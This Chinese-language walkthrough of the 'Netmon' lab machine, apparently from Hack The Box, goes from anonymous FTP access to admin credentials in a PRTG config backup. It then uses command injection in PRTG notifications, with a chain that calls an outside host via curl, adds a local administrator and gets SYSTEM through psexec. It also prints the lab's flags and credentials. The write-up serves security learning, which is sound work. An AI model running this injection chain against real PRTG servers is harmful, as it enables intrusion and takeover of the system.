[Meachines] [Easy] Netmon FTP匿名登录+PRTG 网络监控RCE权限提升
字数 1051 2025-08-20 18:18:11

PRTG 网络监控系统漏洞利用与权限提升教学文档

1. 信息收集阶段

1.1 初始扫描

使用Nmap进行端口扫描:

nmap -p- 10.10.10.152 --min-rate 1000 -sC -sV

扫描结果:

  • 21/tcp: FTP服务 (Microsoft ftpd)
    • 允许匿名登录 (Anonymous FTP login allowed)
    • 目录结构可见
  • 135/tcp: Microsoft Windows RPC
  • 139/tcp: NetBIOS会话服务
  • 445/tcp: Microsoft-DS (文件共享)
  • 5985/tcp: HTTP (Microsoft HTTPAPI httpd 2.0)

操作系统信息:

  • Windows Server 2008 R2 - 2012

1.2 FTP匿名登录

连接FTP并获取初始用户凭证:

ftp 10.10.10.152

使用用户名: anonymous 密码为空

获取用户标志:

ftp> get Users/Public/user.txt

user.txt内容:aef9a99e68e9807ecc4ecf46fc49746b

2. 漏洞发现与利用

2.1 发现PRTG网络监控系统

在FTP目录中发现PRTG配置文件:

ftp> cd "ProgramData/Paessler/PRTG Network Monitor"
ftp> get "PRTG Configuration.old.bak"

查看配置文件发现管理员凭证:

username: prtgadmin
password: PrTg@dmin2018

2.2 访问PRTG Web界面

访问Web界面:

http://10.10.10.152/index.htm

尝试使用发现的凭证登录:

  • 用户名: prtgadmin
  • 密码: PrTg@dmin2018PrTg@dmin2019 (根据日期推断)

3. 权限提升

3.1 利用PRTG通知功能RCE

  1. 登录后进入 Setup > Account Settings > Notifications
  2. 添加新通知
  3. 在通知命令中注入恶意命令:
;curl http://10.10.16.17/rce

完整利用链:

;curl http://10.10.16.17/Run;net user maptnh P0wned /add;curl http://10.10.16.17/UserAdd;net localgroup administrators maptnh /add;curl http://10.10.16.17/Done

3.2 获取系统权限

使用新创建的账户通过psexec获取系统权限:

impacket-psexec 'maptnh:P0wned@10.10.10.152'

获取root标志:

Root.txt fbaa6dc557503e828c1675b86665888f

4. 关键点总结

  1. FTP匿名登录:检查FTP服务是否允许匿名访问,这是常见的信息泄露途径
  2. 配置文件泄露:在FTP目录中查找可能包含凭证的配置文件
  3. 凭证复用:发现的凭证可能在Web应用或其他服务中复用
  4. PRTG RCE漏洞:通过通知功能注入命令实现远程代码执行
  5. 权限提升:通过添加新用户并将其加入管理员组实现权限提升

5. 防御建议

  1. 禁用FTP匿名访问
  2. 配置文件不应包含明文密码
  3. 实施最小权限原则
  4. 对用户输入进行严格过滤,防止命令注入
  5. 定期更新和修补监控系统

6. 扩展思考

  1. 此漏洞利用链展示了从信息收集到权限提升的完整过程
  2. 类似的技术可以应用于其他网络监控系统
  3. 命令注入漏洞是Web应用安全中的常见问题
  4. 横向移动技术在企业网络渗透测试中的重要性
PRTG 网络监控系统漏洞利用与权限提升教学文档 1. 信息收集阶段 1.1 初始扫描 使用Nmap进行端口扫描: 扫描结果: 21/tcp : FTP服务 (Microsoft ftpd) 允许匿名登录 (Anonymous FTP login allowed) 目录结构可见 135/tcp : Microsoft Windows RPC 139/tcp : NetBIOS会话服务 445/tcp : Microsoft-DS (文件共享) 5985/tcp : HTTP (Microsoft HTTPAPI httpd 2.0) 操作系统信息: Windows Server 2008 R2 - 2012 1.2 FTP匿名登录 连接FTP并获取初始用户凭证: 使用用户名: anonymous 密码为空 获取用户标志: user.txt内容: aef9a99e68e9807ecc4ecf46fc49746b 2. 漏洞发现与利用 2.1 发现PRTG网络监控系统 在FTP目录中发现PRTG配置文件: 查看配置文件发现管理员凭证: 2.2 访问PRTG Web界面 访问Web界面: 尝试使用发现的凭证登录: 用户名: prtgadmin 密码: PrTg@dmin2018 或 PrTg@dmin2019 (根据日期推断) 3. 权限提升 3.1 利用PRTG通知功能RCE 登录后进入 Setup > Account Settings > Notifications 添加新通知 在通知命令中注入恶意命令: 完整利用链: 3.2 获取系统权限 使用新创建的账户通过psexec获取系统权限: 获取root标志: 4. 关键点总结 FTP匿名登录 :检查FTP服务是否允许匿名访问,这是常见的信息泄露途径 配置文件泄露 :在FTP目录中查找可能包含凭证的配置文件 凭证复用 :发现的凭证可能在Web应用或其他服务中复用 PRTG RCE漏洞 :通过通知功能注入命令实现远程代码执行 权限提升 :通过添加新用户并将其加入管理员组实现权限提升 5. 防御建议 禁用FTP匿名访问 配置文件不应包含明文密码 实施最小权限原则 对用户输入进行严格过滤,防止命令注入 定期更新和修补监控系统 6. 扩展思考 此漏洞利用链展示了从信息收集到权限提升的完整过程 类似的技术可以应用于其他网络监控系统 命令注入漏洞是Web应用安全中的常见问题 横向移动技术在企业网络渗透测试中的重要性